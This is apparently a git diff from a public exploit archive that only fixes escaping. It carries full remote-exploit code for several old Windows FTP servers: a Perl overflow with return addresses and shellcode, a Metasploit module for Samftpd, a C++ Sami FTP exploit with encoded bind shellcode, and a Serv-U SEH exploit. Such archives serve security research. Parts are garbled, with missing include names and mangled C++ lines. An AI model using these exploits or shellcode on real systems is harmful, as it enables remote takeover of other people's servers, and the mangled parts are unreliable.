+$yourip = "127.0.0.1" ;       # Reikalingas tam, kad bûtø galima sulyginti ðelkodà, nes i steka ásiraðo ir jusu ip adresas, todel áraðykit savo iðorini (jei neturit tokio - gateway ip)
+$offset = "\xE0\x3A\xB4\x76"; # defaultinis offsetas á winmm.dll esantá call esp   (WinXP SP 2)
 
 foreach (@ARGV) {
-$host = $1 if ($_=~/-h((.*)\\.(.*)\\.(.*)\\.(.*))/);
-$yourip = $1 if ($_=~/-y((.*)\\.(.*)\\.(.*)\\.(.*))/);
+$host = $1 if ($_=~/-h((.*)\.(.*)\.(.*)\.(.*))/);
+$yourip = $1 if ($_=~/-y((.*)\.(.*)\.(.*)\.(.*))/);
 $offset = $1 if ($_=~/-o(.*)/);
 }
 #offsetø suradimui naudokit findjmp.exe arba metasploit.com opcodø db ;)  (call esp/jmp esp..)
 switch ($offset) {
-case 1 { $offset = \"\\xE0\\x3A\\xB4\\x76\" } # Windows XP SP2 winmm.dll call esp
-case 2 { $offset = \"\\x7B\\xD1\\xB5\\x76\" } # Windows XP SP1 winmm.dll call esp
-case 3 { $offset = \"\\xFB\\x7B\\xAB\\x71\" } # Windows XP SP0 ws2_32.dll jmp esp
-case 4 { $offset = \"\\xDF\\x95\\x22\\x9C\" } # FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp
+case 1 { $offset = "\xE0\x3A\xB4\x76" } # Windows XP SP2 winmm.dll call esp
+case 2 { $offset = "\x7B\xD1\xB5\x76" } # Windows XP SP1 winmm.dll call esp
+case 3 { $offset = "\xFB\x7B\xAB\x71" } # Windows XP SP0 ws2_32.dll jmp esp
+case 4 { $offset = "\xDF\x95\x22\x9C" } # FreeBSD 6.0-RELEASE Wine 0.9.6  kernel32.dll jmp esp
 }
 
-foreach $letter (split \'\', $yourip) { $c++;};
-$ftp = Net::FTP->new($host, Debug => 0)  or die \"Cannot connect: $@\";
-$user = \"A\" x 213 . # vaþiuojam iki returno :O  (cia irgi galima kiðt ðelkodà :) )
-\"A\" x (15 - $c)   . # dar keli baitai sulyginimui, nes á stekà taip pat ásiraðo ir ip adresas, todël reikia pagal já paskaièiuot, kur raðyt ret adresà
-$offset .           # ret adresas á kokio dll\'o call esp  ar jmp esp, ar ka nors panaðaus svarbu, kad nuðoktume á esp ;)
-\"\\x90\" x 25 .       # nop\'ø sled\'as, kad sulygintume su esp esanèiu adresu
+foreach $letter (split '', $yourip) { $c++;};
+$ftp = Net::FTP->new($host, Debug => 0)  or die "Cannot connect: $@";
+$user = "A" x 213 . # vaþiuojam iki returno :O  (cia irgi galima kiðt ðelkodà :) )
+"A" x (15 - $c)   . # dar keli baitai sulyginimui, nes á stekà taip pat ásiraðo ir ip adresas, todël reikia pagal já paskaièiuot, kur raðyt ret adresà
+$offset .           # ret adresas á kokio dll'o call esp  ar jmp esp, ar ka nors panaðaus svarbu, kad nuðoktume á esp ;)
+"\x90" x 25 .       # nop'ø sled'as, kad sulygintume su esp esanèiu adresu
 
 # ðelkodas paleidþiantis notepadà (ðelkodas skirtas tiem kas sakë, jog critical mëgsta DoS :*) - norësit, ásidësit normalø..
-\"\\xCD\\x03\".
-\"\\xEB\\x61\\x56\\x6A\\x30\\x59\\x64\\x8B\\x01\\x8B\\x40\\x0C\".
-\"\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\x5E\\xC3\\x60\\x8B\\x6C\".
-\"\\x24\\x24\\x8B\\x45\\x3C\\x8B\\x54\\x05\\x78\\x01\\xEA\\x8B\".
-\"\\x4A\\x18\\x8B\\x5A\\x20\\x01\\xEB\\xE3\\x34\\x49\\x8B\\x34\".
-\"\\x8B\\x01\\xEE\\x31\\xFF\\x31\\xC0\\xFC\\xAC\\x84\\xC0\\x74\".
-\"\\x07\\xC1\\xCF\\x0D\\x01\\xC7\\xEB\\xF4\\x3B\\x7C\\x24\\x28\".
-\"\\x75\\xE1\\x8B\\x5A\\x24\\x01\\xEB\\x66\\x8B\\x0C\\x4B\\x8B\".
-\"\\x5A\\x1C\\x01\\xEB\\x8B\\x04\\x8B\\x01\\xE8\\x89\\x44\\x24\".
-\"\\x1C\\x61\\xC3\\xE8\\x9A\\xFF\\xFF\\xFF\\x68\\x98\\xFE\\x8A\".
-\"\\x0E\\x50\\xE8\\xA2\\xFF\\xFF\\xFF\\xEB\\x02\\xEB\\x05\\xE8\".
-\"\\xF9\\xFF\\xFF\\xFF\\x5B\\x83\\xC3\\x1C\\x33\\xC9\\x88\\x0B\".
-\"\\x83\\xEB\\x0B\\x41\\x51\\x53\\xFF\\xD0\\x90\\x6E\\x6F\\x74\".
-\"\\x65\\x70\\x61\\x64\\x2E\\x65\\x78\\x65\\x01\";
-$ftp->login(\"$user\",\"biatch\");
+"\xCD\x03".
+"\xEB\x61\x56\x6A\x30\x59\x64\x8B\x01\x8B\x40\x0C".
+"\x8B\x70\x1C\xAD\x8B\x40\x08\x5E\xC3\x60\x8B\x6C".
+"\x24\x24\x8B\x45\x3C\x8B\x54\x05\x78\x01\xEA\x8B".
+"\x4A\x18\x8B\x5A\x20\x01\xEB\xE3\x34\x49\x8B\x34".
+"\x8B\x01\xEE\x31\xFF\x31\xC0\xFC\xAC\x84\xC0\x74".
+"\x07\xC1\xCF\x0D\x01\xC7\xEB\xF4\x3B\x7C\x24\x28".
+"\x75\xE1\x8B\x5A\x24\x01\xEB\x66\x8B\x0C\x4B\x8B".
+"\x5A\x1C\x01\xEB\x8B\x04\x8B\x01\xE8\x89\x44\x24".
+"\x1C\x61\xC3\xE8\x9A\xFF\xFF\xFF\x68\x98\xFE\x8A".
+"\x0E\x50\xE8\xA2\xFF\xFF\xFF\xEB\x02\xEB\x05\xE8".
+"\xF9\xFF\xFF\xFF\x5B\x83\xC3\x1C\x33\xC9\x88\x0B".
+"\x83\xEB\x0B\x41\x51\x53\xFF\xD0\x90\x6E\x6F\x74".
+"\x65\x70\x61\x64\x2E\x65\x78\x65\x01";
+$ftp->login("$user","biatch");
 
 # milw0rm.com [2006-01-25]
diff --git a/platforms/windows/remote/14519.html b/platforms/windows/remote/14519.html
index 0f1d2d1f3..389c546aa 100755
--- a/platforms/windows/remote/14519.html
+++ b/platforms/windows/remote/14519.html
@@ -6,22 +6,22 @@ Tested:		Windows XP SP3 on IE6 + IE7
 Date:		July, 30 2010
 -->
 
-
-
diff --git a/platforms/windows/remote/1452.pm b/platforms/windows/remote/1452.pm
index bc00c1030..352c3e446 100755
--- a/platforms/windows/remote/1452.pm
+++ b/platforms/windows/remote/1452.pm
@@ -5,7 +5,7 @@
 ##
 
 package Msf::Exploit::pmsoftware_samftpd;
-use base \"Msf::Exploit\";
+use base "Msf::Exploit";
 use strict;
 use Pex::Text;
 
@@ -13,111 +13,111 @@ my $advanced = { };
 
 my $info =
   {
-	\'Name\'     => \'PMSoftware Samftpd Remote Exploit\',
-	\'Version\'  => \'$Revision: 1.0 $\',
-	\'Authors\'  => [ \'\', ],
+	'Name'     => 'PMSoftware Samftpd Remote Exploit',
+	'Version'  => '$Revision: 1.0 $',
+	'Authors'  => [ '', ],
 
-	\'Arch\'  => [ \'x86\' ],
-	\'OS\'    => [ \'win32\', \'win2000\', \'winxp\', \'win2003\' ],
-	\'Priv\'  => 0,
+	'Arch'  => [ 'x86' ],
+	'OS'    => [ 'win32', 'win2000', 'winxp', 'win2003' ],
+	'Priv'  => 0,
 
-	\'AutoOpts\'  => { \'EXITFUNC\' => \'thread\' },
-	\'UserOpts\'  =>
+	'AutoOpts'  => { 'EXITFUNC' => 'thread' },
+	'UserOpts'  =>
 	  {
-		\'RHOST\' => [1, \'ADDR\', \'The target address\'],
-		\'RPORT\' => [1, \'PORT\', \'The target port\', 21],
-		\'USER\'  => [1, \'DATA\', \'Username\', \'redsand0wnedj00\'],
+		'RHOST' => [1, 'ADDR', 'The target address'],
+		'RPORT' => [1, 'PORT', 'The target port', 21],
+		'USER'  => [1, 'DATA', 'Username', 'redsand0wnedj00'],
 	  },
 
-	\'Payload\'  =>
+	'Payload'  =>
 	  {
-		\'Space\' => 1024,
-		\'BadChars\'  => \"\\x00\\x0a\\x0d\\x20\",
-		\'Keys\' => [\'+ws2ord\'],
-	#	\'Prepend\' => \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\",
+		'Space' => 1024,
+		'BadChars'  => "\x00\x0a\x0d\x20",
+		'Keys' => ['+ws2ord'],
+	#	'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
 	  },
 
-	\'Description\'  =>  Pex::Text::Freeform(qq{
+	'Description'  =>  Pex::Text::Freeform(qq{
 		This module exploits a stack overflow in the log handler of Samftpd
 	
 }),
 
-	\'Refs\'  =>
+	'Refs'  =>
 	  [
-		[\'SA18574\',   \'secunia.com/advisories/SA18574\'],
+		['SA18574',   'secunia.com/advisories/SA18574'],
 	  ],
 
-	\'DefaultTarget\' => 0,
-	\'Targets\' =>
+	'DefaultTarget' => 0,
+	'Targets' =>
 	  [
-		[\'SamFtpd PmSoftware.exe WinXP SP0/1 Eng.\', 0x71ab7bfb],
-		[\'SamFtpd PmSoftware.exe WinXP SP2 Eng.\', 0x77daaccf],
+		['SamFtpd PmSoftware.exe WinXP SP0/1 Eng.', 0x71ab7bfb],
+		['SamFtpd PmSoftware.exe WinXP SP2 Eng.', 0x77daaccf],
 	  ],
 
-	\'Keys\'  => [\'samftpd\'],
+	'Keys'  => ['samftpd'],
 
-	\'DisclosureDate\' => \'Jan 25 2006\',
+	'DisclosureDate' => 'Jan 25 2006',
   };
 
 sub new {
 	my $class = shift;
-	my $self = $class->SUPER::new({\'Info\' => $info, \'Advanced\' => $advanced}, @_);
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
 	return($self);
 }
 
 sub Exploit {
 	my $self = shift;
-	my $target_host = $self->GetVar(\'RHOST\');
-	my $target_port = $self->GetVar(\'RPORT\');
-	my $target_idx  = $self->GetVar(\'TARGET\');
-	my $shellcode   = $self->GetVar(\'EncodedPayload\')->Payload;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
 	my $target      = $self->Targets->[$target_idx];
-	my $header	= \"\\x81\\xc4\\xff\\xef\\xff\\xff\\x44\";
+	my $header	= "\x81\xc4\xff\xef\xff\xff\x44";
 
 	if (! $self->InitNops(30)) {
-		$self->PrintLine(\"[*] Failed to initialize the NOP module.\");
+		$self->PrintLine("[*] Failed to initialize the NOP module.");
 		return;
 	}
 
-	my $evil = (\"PASS \");
-	$evil .= \"A\"x219;
+	my $evil = ("PASS ");
+	$evil .= "A"x219;
 
-	$evil .= pack(\"V\", $target->[1]) x 5 ;
-	$evil .= \"\\x90\\x90\" x 5; # little bit of padding
+	$evil .= pack("V", $target->[1]) x 5 ;
+	$evil .= "\x90\x90" x 5; # little bit of padding
 	$evil .= $shellcode;
-	$evil .= \"\\x0a\\x0d\";
+	$evil .= "\x0a\x0d";
 
 	my $s = Msf::Socket::Tcp->new
 	  (
-		\'PeerAddr\'  => $target_host,
-		\'PeerPort\'  => $target_port,
-		\'LocalPort\' => $self->GetVar(\'CPORT\'),
+		'PeerAddr'  => $target_host,
+		'PeerPort'  => $target_port,
+		'LocalPort' => $self->GetVar('CPORT'),
 	  );
 
-	$self->PrintLine(sprintf (\"[*] PMSoftware Samftpd Remote Exploit by redsand\\@blacksecurity.org\"));
+	$self->PrintLine(sprintf ("[*] PMSoftware Samftpd Remote Exploit by redsand\@blacksecurity.org"));
 
 	if ($s->IsError) {
-		$self->PrintLine(\'[*] Error creating socket: \' . $s->GetError);
+		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
 		return;
 	}
 
-	#$self->PrintLine(sprintf (\"[*] Trying \".$target->[0].\" using return address 0x%.8x....\", $target->[4]));
+	#$self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[4]));
 
 	my $r = $s->Recv(-1, 30);
-	if (! $r) { $self->PrintLine(\"[*] No response from FTP server\"); return; }
-	($r) = $r =~ m/^([^\\n\\r]+)(\\r|\\n)/;
-	$self->PrintLine(\"[*] $r\");
+	if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
+	($r) = $r =~ m/^([^\n\r]+)(\r|\n)/;
+	$self->PrintLine("[*] $r");
 
-	$self->PrintLine(\"[*] Login as \" .$self->GetVar(\'USER\'));
-	$s->Send(\"USER \".$self->GetVar(\'USER\').\"\\r\\n\");
+	$self->PrintLine("[*] Login as " .$self->GetVar('USER'));
+	$s->Send("USER ".$self->GetVar('USER')."\r\n");
 	$r = $s->Recv(-1, 10);
-	if (! $r) { $self->PrintLine(\"[*] No response from FTP server\"); return; }
+	if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
 
-	$self->PrintLine(\"[*] Sending evil buffer....\");
+	$self->PrintLine("[*] Sending evil buffer....");
 	$s->Send($evil);
 	#$r = $s->Recv(-1, 10);
-	if (! $r) { $self->PrintLine(\"[*] No response from FTP server\"); return; }
-	$self->Print(\"[*] $r\");
+	if (! $r) { $self->PrintLine("[*] No response from FTP server"); return; }
+	$self->Print("[*] $r");
 	return;
 
 }
diff --git a/platforms/windows/remote/1462.cpp b/platforms/windows/remote/1462.cpp
index c1f839030..345b2ee03 100755
--- a/platforms/windows/remote/1462.cpp
+++ b/platforms/windows/remote/1462.cpp
@@ -1,35 +1,35 @@
 // Two includes.
 #include 
 #include 
-// Project - Settings - Link > Object/Library modules \'Ws2_32.lib\' 
-#pragma comment(lib, \"ws2_32\")
+// Project - Settings - Link > Object/Library modules 'Ws2_32.lib' 
+#pragma comment(lib, "ws2_32")
 
-char MyShellCode[] =       // XOR by \\x99\\x99\\x99\\x99.
-\"\\xD9\\xEE\\xD9\\x74\\x24\\xF4\\x5B\\x31\\xC9\\xB1\\x59\\x81\\x73\\x17\\x99\\x99\"
-\"\\x99\\x99\\x83\\xEB\\xFC\\xE2\" // Bind ShellCode port 777.
-                        \"\\xF4\\x71\\xA1\\x99\\x99\\x99\\xDA\\xD4\\xDD\\x99\"
-\"\\x7E\\xE0\\x5F\\xE0\\x7C\\xD0\\x1F\\xD0\\x3D\\x34\\xB7\\x70\\x3D\\x83\\xE9\\x5E\"
-\"\\x40\\x90\\x6C\\x34\\x52\\x74\\x65\\xA2\\x17\\xD7\\x97\\x75\\xE7\\x41\\x7B\\xEA\"
-\"\\x34\\x40\\x9C\\x57\\xEB\\x67\\x2A\\x8F\\xCE\\xCA\\xAB\\xC6\\xAA\\xAB\\xB7\\xDD\"
-\"\\xD5\\xD5\\x99\\x98\\xC2\\xCD\\x10\\x7C\\x10\\xC4\\x99\\xF3\\xA9\\xC0\\xFD\\x12\"
-\"\\x98\\x12\\xD9\\x95\\x12\\xE9\\x85\\x34\\x12\\xC1\\x91\\x72\\x95\\x14\\xCE\\xB5\"
-\"\\xC8\\xCB\\x66\\x49\\x10\\x5A\\xC0\\x72\\x89\\xF3\\x91\\xC7\\x98\\x77\\xF3\\x93\"
-\"\\xC0\\x12\\xE4\\x99\\x19\\x60\\x9F\\xED\\x7D\\xC8\\xCA\\x66\\xAD\\x16\\x71\\x09\"
-\"\\x99\\x99\\x99\\xC0\\x10\\x9D\\x17\\x7B\\x72\\xA8\\x66\\xFF\\x18\\x75\\x09\\x98\"
-\"\\xCD\\xF1\\x98\\x98\\x99\\x99\\x66\\xCC\\xB9\\xCE\\xCE\\xCE\\xCE\\xDE\\xCE\\xDE\"
-\"\\xCE\\x66\\xCC\\x85\\x10\\x5A\\xA8\\x66\\xCE\\xCE\\xF1\\x9B\\x99\\x9A\\x90\\x10\"
-\"\\x7F\\xF3\\x89\\xCF\\xCA\\x66\\xCC\\x81\\xCE\\xCA\\x66\\xCC\\x8D\\xCE\\xCF\\xCA\"
-\"\\x66\\xCC\\x89\\x10\\x5B\\xFF\\x18\\x75\\xCD\\x99\\x14\\xA5\\xBD\\xA8\\x59\\xF3\"
-\"\\x8C\\xC0\\x6A\\x32\\x10\\x4E\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA4\\x10\"
-\"\\xE5\\xBD\\xD1\\x10\\xE5\\xBD\\xD5\\x10\\xE5\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\xCD\"
-\"\\xC9\\xC8\\xC8\\xC8\\xD8\\xC8\\xD0\\xC8\\xC8\\x66\\xEC\\x99\\xC8\\x66\\xCC\\xA9\"
-\"\\x10\\x78\\xF1\\x66\\x66\\x66\\x66\\x66\\xA8\\x66\\xCC\\xB5\\xCE\\x66\\xCC\\x95\"
-\"\\x66\\xCC\\xB1\\xCA\\xCC\\xCF\\xCE\\x12\\xF5\\xBD\\x81\\x12\\xDC\\xA5\\x12\\xCD\"
-\"\\x9C\\xE1\\x98\\x73\\x12\\xD3\\x81\\x12\\xC3\\xB9\\x98\\x72\\x7A\\xAB\\xD0\\x12\"
-\"\\xAD\\x12\\x98\\x77\\xA8\\x66\\x65\\xA8\\x59\\x35\\xA1\\x79\\xED\\x9E\\x58\\x56\"
-\"\\x94\\x98\\x5E\\x72\\x6B\\xA2\\xE5\\xBD\\x8D\\xEC\\x78\\x12\\xC3\\xBD\\x98\\x72\"
-\"\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\\x98\\x72\\x12\\x9D\\x12\\x98\\x71\\x72\\x9B\"
-\"\\xA8\\x59\\x10\\x73\\xC6\\xC7\\xC4\\xC2\\x5B\\x91\\x99\";
+char MyShellCode[] =       // XOR by \x99\x99\x99\x99.
+"\xD9\xEE\xD9\x74\x24\xF4\x5B\x31\xC9\xB1\x59\x81\x73\x17\x99\x99"
+"\x99\x99\x83\xEB\xFC\xE2" // Bind ShellCode port 777.
+                        "\xF4\x71\xA1\x99\x99\x99\xDA\xD4\xDD\x99"
+"\x7E\xE0\x5F\xE0\x7C\xD0\x1F\xD0\x3D\x34\xB7\x70\x3D\x83\xE9\x5E"
+"\x40\x90\x6C\x34\x52\x74\x65\xA2\x17\xD7\x97\x75\xE7\x41\x7B\xEA"
+"\x34\x40\x9C\x57\xEB\x67\x2A\x8F\xCE\xCA\xAB\xC6\xAA\xAB\xB7\xDD"
+"\xD5\xD5\x99\x98\xC2\xCD\x10\x7C\x10\xC4\x99\xF3\xA9\xC0\xFD\x12"
+"\x98\x12\xD9\x95\x12\xE9\x85\x34\x12\xC1\x91\x72\x95\x14\xCE\xB5"
+"\xC8\xCB\x66\x49\x10\x5A\xC0\x72\x89\xF3\x91\xC7\x98\x77\xF3\x93"
+"\xC0\x12\xE4\x99\x19\x60\x9F\xED\x7D\xC8\xCA\x66\xAD\x16\x71\x09"
+"\x99\x99\x99\xC0\x10\x9D\x17\x7B\x72\xA8\x66\xFF\x18\x75\x09\x98"
+"\xCD\xF1\x98\x98\x99\x99\x66\xCC\xB9\xCE\xCE\xCE\xCE\xDE\xCE\xDE"
+"\xCE\x66\xCC\x85\x10\x5A\xA8\x66\xCE\xCE\xF1\x9B\x99\x9A\x90\x10"
+"\x7F\xF3\x89\xCF\xCA\x66\xCC\x81\xCE\xCA\x66\xCC\x8D\xCE\xCF\xCA"
+"\x66\xCC\x89\x10\x5B\xFF\x18\x75\xCD\x99\x14\xA5\xBD\xA8\x59\xF3"
+"\x8C\xC0\x6A\x32\x10\x4E\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA4\x10"
+"\xE5\xBD\xD1\x10\xE5\xBD\xD5\x10\xE5\xBD\xC9\x14\xDD\xBD\x89\xCD"
+"\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\xEC\x99\xC8\x66\xCC\xA9"
+"\x10\x78\xF1\x66\x66\x66\x66\x66\xA8\x66\xCC\xB5\xCE\x66\xCC\x95"
+"\x66\xCC\xB1\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD"
+"\x9C\xE1\x98\x73\x12\xD3\x81\x12\xC3\xB9\x98\x72\x7A\xAB\xD0\x12"
+"\xAD\x12\x98\x77\xA8\x66\x65\xA8\x59\x35\xA1\x79\xED\x9E\x58\x56"
+"\x94\x98\x5E\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78\x12\xC3\xBD\x98\x72"
+"\xFF\x12\x95\xD2\x12\xC3\x85\x98\x72\x12\x9D\x12\x98\x71\x72\x9B"
+"\xA8\x59\x10\x73\xC6\xC7\xC4\xC2\x5B\x91\x99";
 
 static char PayLoad[1329];  
 
@@ -39,28 +39,28 @@ int szNOP1, szNOP2;
 int Nop; 
 
 // Jump ESP by library User32 on Win2000 SP4 fr..
-char JmpESP[] = \"\\x0C\\xED\\xE3\\x77\";
+char JmpESP[] = "\x0C\xED\xE3\x77";
 // Flag ID server Sami FTP.
-char TargetFlag[] = \"220-\\r\\n220 Features p a .\";
+char TargetFlag[] = "220-\r\n220 Features p a .";
 char RecvBuff[200];
 
 void usage(){
-  cout<<\" \"< 3 ) ){usage();return -1;} 
 
 if( argc > 1 ){ 
-  cout<<\"argv[1]\"<<\"\\t\"<
 #include 
 
-#pragma comment(lib, \"ws2_32\")
+#pragma comment(lib, "ws2_32")
 
 // for bind shellcode
 #define BIND_OFFSET		91
@@ -37,8 +37,8 @@
 #define SEH_OFFSET		0x193	//v3.0.0.20~v4.1.0.11
 //#define	SEH_OFFSET		0x133 // work on v3.0.0.16~v3.0.0.19, for connectback shellcode
 #define MAX_LEN			2048
-#define JMP_OVER		\"\\xeb\\x06\\xeb\\x06\"
-#define	VERSION			\"1.0\"
+#define JMP_OVER		"\xeb\x06\xeb\x06"
+#define	VERSION			"1.0"
 
 struct
 {
@@ -46,16 +46,16 @@ struct
 	char	*szDescription;
 }targets[] =
 {
-	{0x7ffa4a1b,\"Serv-U v3.0.0.20~v4.1.0.11  GB     2K/XP  ALL\"},	//for all GB win2000 and winxp
-// {0x74FD69A9,\"Serv-U v3.0.0.20~v4.1.0.11  GB     2K     SP3/SP4\"},	//wsock32.dll jmp ebx addr
-// {0x71a469ad,\"Serv-U v3.0.0.20~v4.1.0.11  GB     XP     SP0/SP1\"},	//wsock32.dll jmp ebx addr
-// {0x77e45f17,\"Serv-U v3.0.0.20~v4.1.0.11  GB/BG  2K     SP4\"},	//user32.dll jmp ebx addr
-// {0x7ffa2186,\"Serv-U v3.0.0.20~v4.1.0.11  BG     2K/XP  ALL\"},	//for all BG win2000 and winxp	
-// {0x6dec6713,\"Serv-U v3.0.0.20~v4.1.0.11  BG     2K     SP4\"},	//setupapi.dll jmp ebx addr
-// {0x6DEE6713,\"Serv-U v3.0.0.20~v4.1.0.11  KR     2K     SP4\"},	//setupapi.dll jmp ebx addr
-// {0x77886713,\"Serv-U v3.0.0.20~v4.1.0.11  EN     2K     SP4\"},	//setupapi.dll jmp ebx addr
-// {0x76b42a3a,\"Serv-U v3.0.0.20~v4.1.0.11  EN     XP     SP1\"},
-// {0x12345678,\"Serv-U v3.0.0.20~v4.1.0.11\"},         
+	{0x7ffa4a1b,"Serv-U v3.0.0.20~v4.1.0.11  GB     2K/XP  ALL"},	//for all GB win2000 and winxp
+// {0x74FD69A9,"Serv-U v3.0.0.20~v4.1.0.11  GB     2K     SP3/SP4"},	//wsock32.dll jmp ebx addr
+// {0x71a469ad,"Serv-U v3.0.0.20~v4.1.0.11  GB     XP     SP0/SP1"},	//wsock32.dll jmp ebx addr
+// {0x77e45f17,"Serv-U v3.0.0.20~v4.1.0.11  GB/BG  2K     SP4"},	//user32.dll jmp ebx addr
+// {0x7ffa2186,"Serv-U v3.0.0.20~v4.1.0.11  BG     2K/XP  ALL"},	//for all BG win2000 and winxp	
+// {0x6dec6713,"Serv-U v3.0.0.20~v4.1.0.11  BG     2K     SP4"},	//setupapi.dll jmp ebx addr
+// {0x6DEE6713,"Serv-U v3.0.0.20~v4.1.0.11  KR     2K     SP4"},	//setupapi.dll jmp ebx addr
+// {0x77886713,"Serv-U v3.0.0.20~v4.1.0.11  EN     2K     SP4"},	//setupapi.dll jmp ebx addr
+// {0x76b42a3a,"Serv-U v3.0.0.20~v4.1.0.11  EN     XP     SP1"},
+// {0x12345678,"Serv-U v3.0.0.20~v4.1.0.11"},         
 },v;
 
 
@@ -63,74 +63,74 @@ unsigned char	*szSend[4];
 unsigned char	szCommand[MAX_LEN];
 char		szDirectory[0x100];
 
-// 28 bytes decode by lion, don\'t change this.
+// 28 bytes decode by lion, don't change this.
 unsigned char decode[]=
-\"\\xBE\\x6D\\x69\\x6F\\x6E\\x4E\\xBF\\x6D\\x69\\x30\\x6E\\x4F\\x43\\x39\\x3B\\x75\"
-\"\\xFB\\x4B\\x80\\x33\\x93\\x39\\x73\\xFC\\x75\\xF7\\xFF\\xD3\";
+"\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75"
+"\xFB\x4B\x80\x33\x93\x39\x73\xFC\x75\xF7\xFF\xD3";
 
-// Shellcode start sign, use for decode, don\'t change this.
+// Shellcode start sign, use for decode, don't change this.
 unsigned char sc_start[]=
-\"lion\"; 
+"lion"; 
 
-// Shellcode end sign, use for decode, don\'t change this.
+// Shellcode end sign, use for decode, don't change this.
 unsigned char sc_end[]=
-\"li0n\"; 
+"li0n"; 
 
 // 311 bytes bind shellcode by lion (xor with 0x93)
 unsigned char sc[]=
-\"\\x7A\\x96\\x92\\x93\\x93\\xCC\\xF7\\x32\\xA3\\x93\\x93\\x93\\x18\\xD3\\x9F\\x18\"
-\"\\xE3\\x8F\\x3E\\x18\\xFB\\x9B\\x18\\x64\\xF9\\x97\\xCA\\x7B\\x36\\x93\\x93\\x93\"
-\"\\x71\\x6A\\xFB\\xA0\\xA1\\x93\\x93\\xFB\\xE4\\xE0\\xA1\\xCC\\xC7\\x6C\\x85\\x18\"
-\"\\x7B\\xF9\\x95\\xCA\\x7B\\x1F\\x93\\x93\\x93\\x71\\x6A\\x12\\x7F\\x03\\x92\\x93\"
-\"\\x93\\xC7\\xFB\\x92\\x92\\x93\\x93\\x6C\\xC5\\x83\\xC3\\xC3\\xC3\\xC3\\xF9\\x92\"
-\"\\xF9\\x91\\x6C\\xC5\\x87\\x18\\x4B\\x54\\x94\\x91\\x93\\x93\\xA6\\xA0\\x53\\x1A\"
-\"\\xD4\\x97\\xF9\\x83\\xC4\\xC0\\x6C\\xC5\\x8B\\xF9\\x92\\xC0\\x6C\\xC5\\x8F\\xC3\"
-\"\\xC3\\xC0\\x6C\\xC5\\xB3\\x18\\x4B\\xA0\\x53\\xFB\\xF0\\xFE\\xF7\\x93\\x1A\\xF5\"
-\"\\xA3\\x10\\x7F\\xC7\\x18\\x6F\\xF9\\x87\\xCA\\x1A\\x97\\x1C\\x71\\x68\\x55\\xD4\"
-\"\\x83\\xD7\\x6D\\xD4\\xAF\\x6D\\xD4\\xAE\\x1A\\xCC\\xDB\\x1A\\xCC\\xDF\\x1A\\xCC\"
-\"\\xC3\\x1E\\xD7\\xB7\\x83\\xC4\\xC3\\xC2\\xC2\\xC2\\xF9\\x92\\xC2\\xC2\\x6C\\xE5\"
-\"\\xA3\\xC2\\x6C\\xC5\\x97\\x18\\x5F\\xF9\\x6C\\x6C\\xA2\\x6C\\xC5\\x9B\\xC0\\x6C\"
-\"\\xC5\\xB7\\x6C\\xC5\\x9F\\xC2\\xC5\\x18\\xE6\\xAF\\x18\\xE7\\xBD\\xEB\\x90\\x66\"
-\"\\xC5\\x18\\xE5\\xB3\\x90\\x66\\xA0\\x5A\\xDA\\xD2\\x3E\\x90\\x56\\xA0\\x48\\x9C\"
-\"\\x2D\\x83\\xA9\\x45\\xE7\\x9B\\x52\\x58\\x9E\\x90\\x49\\xD3\\x78\\x62\\xA8\\x8C\"
-\"\\xE6\\x74\\xCD\\x18\\xCD\\xB7\\x90\\x4E\\xF5\\x18\\x9F\\xD8\\x18\\xCD\\x8F\\x90\"
-\"\\x4E\\x18\\x97\\x18\\x90\\x56\\x38\\xCD\\xCA\\x50\\x7B\\x65\\x6D\\x6C\\x6C\\x1D\"
-\"\\xDD\\x9D\\x7F\\xE1\\x6D\\x20\\x85\\x3E\\x4A\\x96\\x5D\\xED\\x4B\\x71\\xE0\\x58\"
-\"\\x7E\\x6F\\xA8\\x4A\\x9A\\x66\\x3E\\x37\\x89\\xE3\\x54\\x37\\x3E\\xBD\\x7A\\x76\"
-\"\\xDA\\x15\\xDA\\x74\\xEA\\x55\\xEA\";
+"\x7A\x96\x92\x93\x93\xCC\xF7\x32\xA3\x93\x93\x93\x18\xD3\x9F\x18"
+"\xE3\x8F\x3E\x18\xFB\x9B\x18\x64\xF9\x97\xCA\x7B\x36\x93\x93\x93"
+"\x71\x6A\xFB\xA0\xA1\x93\x93\xFB\xE4\xE0\xA1\xCC\xC7\x6C\x85\x18"
+"\x7B\xF9\x95\xCA\x7B\x1F\x93\x93\x93\x71\x6A\x12\x7F\x03\x92\x93"
+"\x93\xC7\xFB\x92\x92\x93\x93\x6C\xC5\x83\xC3\xC3\xC3\xC3\xF9\x92"
+"\xF9\x91\x6C\xC5\x87\x18\x4B\x54\x94\x91\x93\x93\xA6\xA0\x53\x1A"
+"\xD4\x97\xF9\x83\xC4\xC0\x6C\xC5\x8B\xF9\x92\xC0\x6C\xC5\x8F\xC3"
+"\xC3\xC0\x6C\xC5\xB3\x18\x4B\xA0\x53\xFB\xF0\xFE\xF7\x93\x1A\xF5"
+"\xA3\x10\x7F\xC7\x18\x6F\xF9\x87\xCA\x1A\x97\x1C\x71\x68\x55\xD4"
+"\x83\xD7\x6D\xD4\xAF\x6D\xD4\xAE\x1A\xCC\xDB\x1A\xCC\xDF\x1A\xCC"
